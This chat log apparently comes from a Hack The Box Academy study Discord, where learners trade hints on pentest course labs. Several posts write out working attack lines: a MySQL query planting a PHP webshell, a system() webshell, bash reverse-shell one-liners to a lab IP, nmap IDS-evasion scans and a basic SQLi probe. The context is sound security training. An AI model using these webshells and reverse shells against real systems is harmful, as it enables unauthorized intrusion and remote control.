kk xd

how long did it take i mean CBBH for you?

Watch dogs really motivated me to hack more and more 😆

great xd

Few months, but I have done all the modules twincr and some modules even 3 times

wow

did you try some bugs?

ofc

Hi Guys, can someone kindly help me to find the email of the marketing team of HackTheBox?

or any other ways I can get in touch in with them ?

Think I am overthinking it

Or I have the answer and just can't see it

https://www.hackthebox.com/contact-us

got redirected to the discord actually from that page

On the page below there is a form

Not really, I did CBBH to prepare for CPTS 🙂

yes saw that it's probably for people who are interested in CTF creation using HTB I'm looking for something else, but thank you

Atm I already finished CPTS path.. so I am working on offshore 😆

any kind of email will help tremendously

Otherwise you can also open a support ticket (Green Bubble).

HackTheBox does not publish an email address. So if you want to contact them, you have to either go through the support or fill out the form.

is there something that prevents you from filling out the form

got it thanks mate

just that my higher ups has asked me to get the email of the marketing team but I'll have a chat

Can anyone else give me a nudge with the hard av evasion in the NMAP module?

great!

you have odd number of quotes

try to add ";" before the new-line char. Of course remember to find a way to bypass the security filter in place. EDIT: I guess where the double quotes

thank you very much

hey guys im doing attacking common services easy lab, i got onto ||mysql|| and I've heard i need to upload a webshell, but i have no idea how to, where to etc... been stuck on this since yesterday pls help

You can write (malicious) files 🙂

Also in the modules, they will tell you how do to that exactly in MySQL

ohh okay, thanks!

to what dir tho? like any that is accessable to user of the webpage?

Yes 😁

i tried SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php'; and i get error no such file or dir

well 😉 which type of OS is it hosted on

yeah i sent the wrong one xd i used the path c:\www\webshell/php and c:\www\dashboard\webshell.php

well 😁 You are very close

but when i go to /webshell.php or dashboard/webshell.php

its not working

://///

You are close..

https://superuser.com/questions/969696/setting-a-url-to-go-to-localhost-folder-on-xampp-server

can i have admin?

@naive field Use the link as a nudge 😁

please

@surreal rain

you are right just put the cat on the right place

you are very closed

@rustic sage keep spamming like that and you will get the 👢 from mods

whatever man

yoo thanks

i will rn

Good ; )

idk what im doing wrong xd im trying c:\xampp\htdocs\webshell.php then adding dashboard in between removing stuff 🤷‍♂️ i looked up root dir of xampp servers and tried with those paths but no

:/

that should be correct

||c:\xampp\htdocs\dashboard\webshell.php||

GOT OT

IT

the error was

it need to be capital C

....

bhahaah

Well done hehe!

so now i just add teh revshell script in the string above where i just wrote "c" for testing?

im jus asking since the shell would be long ig

oh wait maybe ftp

||rce ||

ohhhh

thanks haha

np

how realistic is this lab? not very?

In my opinion it's very.. because it allows you to be creative / think outside of the box 😁

You have the know the default web root location of xmapp .. when that doesn't work you have to figure out to which folder you can write😌

In mine option none of the CBBH/CPTS modules are ctfish, they are made for a good reason 😁

this one was from pentester path

but ig they have similar module

yeah i feel like this rce is pretty realistic

but not sure what are the chances to actually get internal access to mysql to do this

That's right 😁 But some questions will drive you crazy XD.. but that are there for a good reason anyway

oh yeah, they def did haha

about to do my first official web pentest for a company tommorrow

hi. hello. yes. How can I assist you.

haha, well it depends if the pentest is white or black box 😁

this just killed my confidence but whatever ig haha

hahaha 😂

Might have something to do with this @surreal rain

There are shared modules between paths. Which is why you can already have x% completed of the other path even though you didn't select it

yeah thats what i meant :)

Out of curiosity... what does the 8 hours represent?

5 days on that module

An average

I spent like maybe 4 hours on it

tbh i never look at those hour desc, they are veery unaccurate

Only AD section took me days 😂

As stated they are an average expectancy based on assumed knowledge of some of the more basic things that the module probably won't teach you

AD enum is taking me days, but that just because I'm taking like several days of breaks between them :°)

haha yea, that section is huge 😁

yeah cuz u prob knew all of this before

or were familiar with it

fs

Eh it's moreso I work retail and want to save my braincells

I have CRTP & CRTE😅 but that was some years ago.. but yea I am pretty familiar with the AD concepts. Nevertheless, their AD section is really solid

I know little to nothing about AD, most sections were just reading comprehension

haha, I am working as a Network Manager ; )

I do think Kerberos attacks module is a good fit within that section tho

Have you done intro to windows Command Line? Lol that one is funky

As a fundamental

Nope haha, I am familiar with CMD/PowerShell

Dude the exam part was kinda fun lol one of the questions being "which user has the most logon failures (event id 4625) in a row which indicates a bruteforcing attack

not just AD, i meant others too haha

wowwwww 😂 that much be a bit of pain 😅

im still not at AD, heard it takes a week or two to finish it

🤷‍♂️

ill have to do that one after cpts then

sounds like its fun

haha

If you are new to the concepts.. then yea maybe 😁

bruh i cant find this flag lol

the output syntax is awful

💀

New line at each timestamp

got it 🙏

used a search cmd, would never find it manyally

manually

Ctrl-f is based

i just used dir "\flag.txt" /s cmd

to find the flag on sys

so do i get admin?

Anyone got a good source for cred stuffing lists?

is that a yes?

Care to share? lol

for the pw attack module?

Just in general, maybe this isn't right forum for that. if so my bad.

The modules mention it, but didn't really ever provide any known lists other than default cred lists

did you check the resources

option\

I am doing the API module and I am super stuck on Identify the username of the user that has a position of 736373 through SQLi. Submit it as your answer.
This is using SQLi on the id parameter. Anytime I put anything in I get the >. Cant figure out what I am doing wrong. Would appreciate a nudge

Ignore them they're a skiddie trying to get discord admin without actually knowing anything

End queries with ;

Yeah, tried that. Tried it on the browser as well. Im doing very basic things like ' OR 1=1-- -;, Im not doing any crazy SQLi

Looking for a nudge on the hard NMAP AV/Evasion lab. Have tried multiple scan attempts; -sU, -sA, nb* & smb* scripts e.g.

• nmap <ip> -p <port> -sU -sV --script nbstat.nse -Pn -n

• `nmap <ip> -p <port> -sU -Pn --reason -D RND:4 --packet-trace --disable-arp-pi

  Have also been monitoring via TCPDUMP & connecting with NC

You might be missing the source of your problem. Reread the section regarding evasion. Specifically the part after Proxies.

Remember your goal is to do it quietly. Bombarding it with rnd and such will get you quickly banned out for a few minutes

Maybe url encoding is needed? Or it's reading the ' as an open quote

So it's expecting a closing quote

Ill keep playing around with it

Thank you

Only thing I can reasonably think of for it to print the >. (Which is indicating it's trying to start/finish a line, similar to bash if you use a single quote it goes to next line )

I've not been getting banned. I tried using the Source method before but I get a lot of errors despite what device I specify, I have also been following and using the syntax.

To use source-port you need to run nmap with sudo

It's nothing complex

I've been using source port, i thought you meant as in source IP. Think Im over complicating as usual.

Thanks

Hint the syntax is similar to the example that uses -sS if you specify the --source-port

From there it is just going down the line

Okay thanks

ls -la

Hello, I'm having a little trouble on the Dancing module. For some reason I can't connect to the SMB I think. It keep saying "tree connect failed: NT_STATUS_BAD_NETWORK_NAME" Any ideas as to what's going on?

Go to #welcome and verify, then you can ask in #starting-point

On password attacks lab - hard: Im nearly complete, I found the backup.vhd, but the only way I found this was logged into xfreerdp as joanna, then cmd command "runas /user:david cmd" so I have a terminal as david and can see the file. But im getting frustrated not being able to simply download this backup.vhd to my kali VM. What am I doing wrong or missing?

You need to find a way to download large files, before the service times out

On File Upload Attacks - Whitelist Filters, I've found something that returns the "File successfully uploaded" text, but when I go to check for the file in the directory that I've made sure is the right one, the file isn't showing up. Any nudges? I can DM as well.

there is no service that times out, im logged into a RDP session using command prompt

theres a couple results that technically bypass the filters but arent valid URLs and so cant be navigated to

so gotta skip those

hey guys, i need some directions for attacking common services medium lab

scanned nmap

tried bruteforcing what i could but nothing

i see there is domain port open, am i supposed to do dns spoofing or sm?

i mean that would lead to nowhere if u get me

so i rly dk rn

If I have the basic php webshell on a page <?php system($_GET['cmd']); ?> shouldn't I be able to run a reverse shell by visiting http://website/shellpage?cmd=bash -i >&%20/dev/tcp/10.10.14.6/4321%200>&1 (i.e., shouldn't I be able to get a reverse shell out of that one-liner?"

whats the easiest way to transfer a file from a xfreerdp session via powershell to attack kali vm

try to specify the full path to bash, e.g. /bin/bash

You can mount a local folder and use it to transfer files

Mount the drive using /drive:/home/htb/myfolder,webdrive

use : /drive:linux,</path-you-wanna-share>

Also use /dynamic-resolution 🙂

I can't seem to get this to work, ok it should work though. I mean it's command execution so it should be doable.

just got it after that tip, thanks!

I'm stucked since 4hours on this module, Active Sub-domain enumeration

Find and submit the contents of the TXT record as the answer.

Reset lab, scan all ports?

https://imgur.com/xiCvafg - so idk if im asking this right, idk why im so confused here. I just need this backup.vhd file moved to my kali box

use dig txt

Try with another one liner, or you can try with /bin/bash -c "/bin/bash -i >& /dev/tcp/<IP>/<port> 0>&1"

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Reverse Shell Cheatsheet.md this may be a help too

https://imgur.com/xiCvafg - does anyone know how to move this backup.vhd file to kali vm?

Can someone please help me with Use NSE and its scripts to find the flag that one of the services contain and submit it as the answer.?
nmap module
I tried almost all script categories and aggressive scan and foujnd a webserver as the hint suggests but no flag

No TXT records

There are, show me your command that you are using

You don't need to do anything with the dns port.

0xFOrk mentioned it above

even ran the command for all of these

your command is wrong

In order to see the 'right' TXT record. You have to specify an ||internal|| zone 😉

i did this before ;3

my screenshot shows that command, and its not working. Pretty sure my question is not clear since that command does not make sense in this situation

yes, but maybe you have to specify a different name sever 👀

||ns||

that command is for your xfreerdp one

Msg me what ur trying with screenshot I'll see

'''dig txt inlanefreight.htb ns.inlanefreight.htb'''

or verify your account and you can post images

That is not a valid command

You have to supply an other parameter in your command 😁

maybe a hint? 😉

dig --help

Review the module again, then you will understand what you are missing ; )

if not, I will provide the answer after 1 hour or so

the module is about using nslookup, however that command wont work

https://www.thegeekstuff.com/2012/02/dig-command-examples/

Look at number; 8 of this article ; )

8. Use a Specific DNS server Using dig @dnsserver

||dig TXT @ns1.inlanefreight.htb inlanefreight.htb dig: couldn't get address for 'ns1.inlanefreight.htb': not found||

same with ns

the error is right at front of you

Understand what you are doing 😁 and why that command doesn't work

htb is not an approved top-level doman.
So you have to specify a nameserver that knows the zone.

Aaah, finally

thankyou buddies :))

Good job! That's the mentality, to try better and at the end you are able to solve it without to much help.

This module is confusing, same part in footprinting module had me frustated

This means that you should definitely learn more about DNS.

ugh I had to use smbclient as david, no wonder I was stuck in an impossible spot

Hi! I'm trying to enumerate Firewall and IDS/IPS Evasion - Medium Lab, I'm using the command:

sudo nmap 10.129.113.199 -sA -sV -Pn -F --packet-trace --version-trace -n --disable-arp-ping -T 2 -D RND:5 --source-port 53

And the question is:
After the configurations are transferred to the system, our client wants to know if it is possible to find out our target's DNS server version. Submit the DNS server version of the target as the answer.
Could someone point me in the right direction? I'm quite lost.

I hope someone can help me I do the footprinting lab- medium. I logged in with rdp and find a the file with the password, and now I don’t know how to connect to the sql server. I read something about, that I have to start sql with admin permissions, but I can’t type “@“ in the admin password bar does anyone have the same problem? And if I want to connect the sql database it doesn’t let me with the administrator account.

i did, i got 5 ports: ssh, pop3 , domain and ftp

2 pop3 ports

i've heard from someone i need 6 ports open

but i restarted the machine, did -p- in nmap

nothing

always same

🤷‍♂️

It takes like 5+ resets for the 6th port to appear

huh

lol

shit i think i even did like 5

ig ill reset

till it pops up...

Reset and wait 5mins before scanning aswell

Can anyone help me understand how this hash "31d6cfe0d16ae931b73c59d7e0c089c0" is an empty string for the HARD password attack lab? This should be the admin hash

okay

i reseted 15 times lol

ill let it wait then

a few min

Any luck?

you can use the mssql management studio application to do the query

im doing Login Brute Forcing web skills assesment. Is their a username i should be using or do i need to make a username list?

yeah

Module: Footprint > Oracle TNS
Is there a way to connect to TNS without sqlplus? It's painful to install it
Should odat be enough?

Afaik no. Following the instructions in the section should be more than enough. They even tell you what to do if you run into a couple specific errors

Has anyone finished Skills Assessment - Hard of the HTTP Misconfigurations Module? I'm stuck on a section and it's driving me crazy. Payload works, but don't understand why admin isn't hitting the page

Dm

I have a bit of a strange issue. Has anyone come across a situation where a section isn't being marked as complete even though they have answered all the questions?

You need to click "mark complete and next"

I have done that, but weirdly enough it isn't actually marking it as complete in the list.

It is the Antak Webshell section in the Shells & Payloads module. I have finished everything in the module, but that one section is preventing it from registering the module as complete.

Message support then

¯_(ツ)_/¯

Fair enough, thanks for looking. Wasn't sure if there was something I was missing.

did any of yall get error Authentication failed with smbmap

even tho Null login is available on the server?

What's your command?

smbmap -H ip

Ah, ok, I was gonna suggest that lol, because i remember not being able to get a null session with -u "" -p ""

yeah idk :D

Try smbclient maybe, I've done some boxes where smbclient works and smbmap doesn't

yeah smbclient does, was just trynna do the enum automated

thanks

Yea, i much prefer smbmap